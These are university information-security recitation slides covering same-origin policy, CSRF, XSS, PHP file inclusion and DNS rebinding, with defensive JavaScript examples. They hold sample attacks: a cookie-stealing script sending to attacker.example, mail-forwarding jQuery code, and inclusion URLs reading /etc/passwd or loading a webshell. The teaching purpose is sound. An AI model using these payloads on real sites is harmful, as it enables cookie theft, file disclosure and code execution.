Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at Itamar Gilad (itamargi at

1 Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at Itamar Gilad (itamargi at

2 Today
- XSS – Cross Site Scripting
- SOP – Same Origin Policy
- CSRF – Cross Site Request Forgery
- PHP file inclusion vulnerabilities
- DNS rebinding (if we have time)

3 Original Problem
Problem: a page on one site fetches a page from another site (the browser sends the user's cookies along) and forwards the response to the attacker:
$.get("", function(data) { $.post("", {maildata: data}); });
Solution: SOP. The browser refuses the read: XMLHttpRequest cannot load ... Origin https://bad- is not allowed by Access-Control-Allow-Origin.

4 Same Origin Policy
Modern sites use elements from many different sources (e.g. main content, embedded ads, embedded Google Maps controls, an embedded Twitter feed, etc.). Without the SOP we would have to trust ALL of that code. With the SOP, interactions between documents are limited by 'origin'. An origin is the combination of protocol (scheme), host name and port; a script may read content from another document only if both were loaded from the same origin.

5 SOP examples
Compared against a page loaded over http from a given host, a second URL is:
- Same protocol and host, different path: allowed
- Same protocol and host, different directory: allowed (the path is not part of the origin)
- Same protocol and host but different port: blocked
- Different protocol (https instead of http): blocked
- Different host, e.g. a subdomain: blocked (exact match required)
- Different host, e.g. the parent domain: blocked (exact match required)
- Same host with the default port written explicitly (:80): don't rely on it, depends on the browser's implementation
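The comparison in the table above, as an added example (not part of the recitation slides): the origin tuple is computed with the WHATWG URL parser that browsers and Node.js share, and a list of constructed URLs is checked against one constructed base page. The host names are illustrative assumptions, not from the slides.

```javascript
// Added example: same-origin comparison the way a browser does it.
// URL.origin keeps scheme, host and port only; it drops user:password,
// path, query and fragment, and omits the port when it is the scheme's
// default (80 for http, 443 for https), so an explicit ":80" is same-origin.
function originOf(urlString) {
  return new URL(urlString).origin;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// "allowed": a script on `base` may read the response of `candidate`.
function sopTable(base, candidates) {
  return candidates.map((url) => ({
    url,
    origin: originOf(url),
    outcome: sameOrigin(base, url) ? "allowed" : "blocked",
  }));
}

// Constructed sample input (assumed host names, not from the slides).
const BASE = "http://www.example.com/dir/page.html";
const CANDIDATES = [
  "http://www.example.com/dir/page2.html",            // same scheme + host
  "http://www.example.com/dir2/other.html",           // path ignored
  "http://user:pass@www.example.com/dir2/other.html", // userinfo ignored
  "http://www.example.com:81/dir/other.html",         // different port
  "https://www.example.com/dir/other.html",           // different scheme
  "http://en.example.com/dir/other.html",             // different host
  "http://example.com/dir/other.html",                // exact host match required
  "http://www.example.com:80/dir/other.html",         // explicit default port
];

function printTable() {
  for (const row of sopTable(BASE, CANDIDATES)) {
    console.log(row.outcome.padEnd(8), row.origin.padEnd(28), row.url);
  }
}
```

The last row is the one the slide marks as implementation-dependent; with the WHATWG URL parser the explicit default port is normalised away and the comparison succeeds, which is what current browsers do.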

6 Cross Site Request Forgery
- User goes to a malicious site
- The site makes the browser send a request to a different site (e.g. Gmail)
- The request is sent with the user's credentials, because the browser attaches that site's cookies to every request it makes there
- The target site accepts the request, but because of the SOP the attacker cannot read the response or the resulting state ('blind' attack)
- ... Profit!
Pseudo example:

7 CSRF - Limitations
- Cannot spoof the Referer header (but few sites check it)
- Easiest when a GET request causes side effects (a single img tag or link does it); a POST can still be forged with an auto-submitted form, but then the user has to visit the attacker's page
- Blind attack: if the attack depends on any prior information (an account ID, the current balance), the attacker has to guess it
- Attack must take place while the user is logged in to the target site
Solution: verification based on random input. The server issues a per-session secret (a CSRF token) and requires it on every state-changing request; a page on a foreign origin cannot read the token because of the SOP, so it cannot forge a valid request.

8 XSS – Cross site scripting reloaded
Today, many sites just aggregate user-generated content:
  o Forums
  o Facebook / Twitter / Reddit
  o Web mail
  o Ynet / nrg – 'talkbacks'
That's great, but what happens if we trust user-submitted content on a website? A user can submit HTML code, and that HTML can be malicious.

9 How malicious are they?
Once the malicious code runs in the context of the target site, it can do whatever the original site can:
  o Steal JavaScript-accessible cookies (those set without the HttpOnly flag)
  o Use any aspect of the site's API: write posts, add friends, delete all user content, send out mass e-mail
E.g.: "Samy is my hero" (the 2005 MySpace worm)

10 Non-persistent (reflected) XSS
The user clicks a link carrying extra parameters; the server reflects them back into the page without proper sanitization, so the attacker's script runs with the target site's origin.

11 Persistent (stored) XSS
- A malicious user submits content to the target site via
  o a forum post / 'talkback' / FB post / tweet
  o an e-mail
  o etc.
- The content is not sanitized and is therefore displayed to every user who views it
- The user's browser treats it as code from the target site, so the SOP does not help: the script is same-origin with the site
- ... Profit!
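Both flavours of XSS from slides 10 and 11 and the output-encoding fix, as an added example that is not from the recitation slides: a reflected search page and a stored feed, each rendered first as-is and then through an HTML escaper. The cookie-stealing payload, the attacker host and the posts are constructed inputs; the `wouldExecuteScript` helper is a deliberately crude stand-in for the browser's parser so the example can be checked offline.

```javascript
// Constructed user-supplied value: the classic cookie-exfiltration payload.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/log?c="+document.cookie</script>';

// Reflected XSS: the search term from the query string is pasted into HTML as-is.
function renderSearchVulnerable(term) {
  return `<p>Results for: ${term}</p>`;
}

// Persistent XSS: posts read back from storage are rendered as-is for everyone.
function renderFeedVulnerable(posts) {
  return posts.map((p) => `<div class="post">${p}</div>`).join("\n");
}

// Fix: escape untrusted text before it lands in an HTML text context, so the
// browser sees characters, not markup. (Attribute, URL and script contexts
// need their own encoders; this one is for element content only.)
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchSafe(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

function renderFeedSafe(posts) {
  return posts.map((p) => `<div class="post">${escapeHtml(p)}</div>`).join("\n");
}

// Crude stand-in for the browser: would this markup create a script element or
// an inline event handler? Real detection is much harder; this exists only so
// the vulnerable and safe renderings can be compared in a test.
function wouldExecuteScript(html) {
  return /<script\b/i.test(html) || /<[^>]+\son[a-z]+\s*=/i.test(html);
}
```

The escaper is the whole fix for text contexts; the rest of the block only shows where untrusted data enters the page in the reflected and the stored case. Marking session cookies HttpOnly limits what a successful XSS can steal, as slide 9 notes, but it does not stop the script from calling the site's API on the victim's behalf.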

12 Questions?

13 PHP File Inclusion Source: Wikipedia

14 PHP File Inclusion cont.
The script appends ".php" to the COLOR parameter and includes the result without validating it, so:
- /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit – executes code from an already uploaded file called exploit.php (local file inclusion)
- /vulnerable.php?COLOR=C:\\notes.txt%00 – uses a NUL byte to cut off the ".php" suffix, allowing access to files other than .php (PHP stopped honouring NUL in include paths in 5.3.4)
- /vulnerable.php?COLOR= /etc/passwd%00 – lets an attacker read the passwd file on a UNIX system (directory traversal combined with the same NUL trick)
- /vulnerable.php?COLOR= /webshell.txt? – includes a remotely hosted file containing malicious code (remote file inclusion); the trailing "?" turns the appended ".php" into a query string, and the include only fetches over the network when allow_url_include is enabled (off by default since PHP 5.2)

15 DNS Rebinding CSRF
We'll discuss a very specific example:
- The client has a home router which we want to access
- We can get the client to browse to our site
- But thanks to the SOP, JS code from our site cannot access the router other than blindly (CSRF)

16 Enter DNS Rebinding
- The DNS for our domain returns two A records:
  o our web server's public address
  o the requesting client's public address
- By default, a browser will use the first address and download our malicious JavaScript
- That JavaScript then makes another request to our domain
- But this time our server refuses the connection
- The browser happily tries the next entry

17 DNS Rebinding cont.
- But that is the public address of the client's home router...
- which should be protected by a firewall from outside access...
- But most routers use interface-based firewall rules and have an internal web server that listens on every interface, so it does not matter: the request arrives from the LAN side and the router answers our client
- So now our JS code can connect to that address and access the home router, and the browser still considers it the same origin as our site, so the script can read the responses
- And it can still connect back outside

18 DNS Rebinding doesn't work anymore (in this form)
- Most routers use HTTP authentication
- You used to be able to browse to http://user:password@ followed by the router's address, and the browser would send the credentials silently
- But that has been disabled: all HTTP auth now requires a user dialog, which makes this variant of the attack infeasible unless the router accepts requests without authentication
- There are also browser and network mitigations one can apply: DNS pinning, DNS filtering (dropping answers from outside domains that point at internal addresses), NoScript, etc.
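Two of the mitigations from slides 16 to 18, as an added example that is not from the recitation slides: the resolver-side "DNS filtering" the slide lists, which drops A records pointing into private ranges, and the check a device's own web server can do on the Host header, which is what stops the slide's variant where the second record is the client's public address rather than a private one. The addresses and allowed host names are constructed assumptions.

```javascript
// --- (1) DNS filtering, as a resolver or home gateway would do it ---------
function ipv4ToInt(ip) {
  const parts = ip.split(".");
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) return null;
    n = n * 256 + Number(p);
  }
  return n;
}

function inCidr(ip, cidr) {
  const [base, bits] = cidr.split("/");
  const mask = bits === "0" ? 0 : (~0 << (32 - Number(bits))) >>> 0;
  const a = ipv4ToInt(ip);
  const b = ipv4ToInt(base);
  if (a === null || b === null) return false;
  return ((a & mask) >>> 0) === ((b & mask) >>> 0);
}

// Address blocks an answer for a public domain has no business pointing at.
const NON_PUBLIC_RANGES = [
  "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
  "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",
];

// Drop A records for non-public addresses from an external domain's answer.
// This defeats the common rebinding variant that points at 192.168.x.x, but
// NOT the slide's variant: the client's own public address passes unchanged.
function filterRebindAnswers(answers) {
  return answers.filter((a) => !NON_PUBLIC_RANGES.some((r) => inCidr(a, r)));
}

// --- (2) Host-header check in the device's own web server -----------------
// After a rebind the browser still sends "Host: <attacker domain>", because
// from its point of view it is talking to the attacker's site. A server that
// only answers requests for its own names refuses the rebound request no
// matter which address the resolver handed out.
const ALLOWED_HOSTS = new Set(["192.168.1.1", "router.local"]); // constructed

function hostHeaderAllowed(hostHeader, allowed = ALLOWED_HOSTS) {
  if (typeof hostHeader !== "string") return false;
  // Accept an optional :port; bracketed IPv6 literals keep their brackets.
  const m = /^(\[[0-9a-f:.]+\]|[^:\s]+)(?::\d{1,5})?$/i.exec(hostHeader.trim());
  return m !== null && allowed.has(m[1].toLowerCase());
}
```

The two checks sit on different boxes: filtering belongs in the resolver or gateway and is cheap but incomplete; the Host check belongs in every embedded web server and is the one that holds when the rebound address is public, as in the slide's scenario.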

19 Questions?
